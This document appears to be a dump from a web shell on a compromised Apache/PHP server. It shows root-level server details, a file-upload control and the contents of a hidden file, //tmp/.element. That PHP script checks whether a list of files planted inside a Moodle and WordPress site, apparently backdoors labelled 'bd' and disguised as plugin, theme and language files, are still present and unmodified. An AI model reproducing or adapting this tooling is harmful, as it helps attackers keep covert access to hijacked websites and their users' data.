HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //tmp/.element
<?php   $r = '/var/www/html/audentes.sumar.com.py'; $x = ["/cursos/mod/assign/classes/navigation/Nofollow.php"=>"bd@@170647@@608",
"/cursos/mod/assign/feedback/editpdf/settings.php"=>"bd@@170655@@X-Dns-Prefetch-Control",
"/cursos/lang/en/tag.php"=>"bd@@170660@@Server-Timing",
"/cursos/mod/lesson/pagetypes/essay.php"=>"bd@@170673@@reverse_searcher",
"/wp-content/themes/twentytwentyfive/patterns/template-query-loop-text-blog.php"=>"bd@@170678@@dataflow_engine",
"/wp-content/plugins/userswp/templates/dashboard-simple.php"=>"bd@@170682@@If-Modified-Since",
"/cursos/course/format/topics/classes/output/courseformat/content/section/class.menu.php"=>"bd@@170683@@644",
"/cursos/lib/editor/atto/plugins/equation/lang/en/atto.equation.php"=>"bd@@170684@@1029",
"/cursos/lib/editor/tinymce/plugins/wrap/classes/privacy/import_status.php"=>"bd@@170686@@1700",
"/wp-content/plugins/elementor/assets/js/packages/editor-app-bar/editor.app.bar.asset.php"=>"bd@@170688@@535",
"/wp-content/plugins/elementor-pro/modules/notes/database/transformers/user.transformer.php"=>"bd@@170690@@1076"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');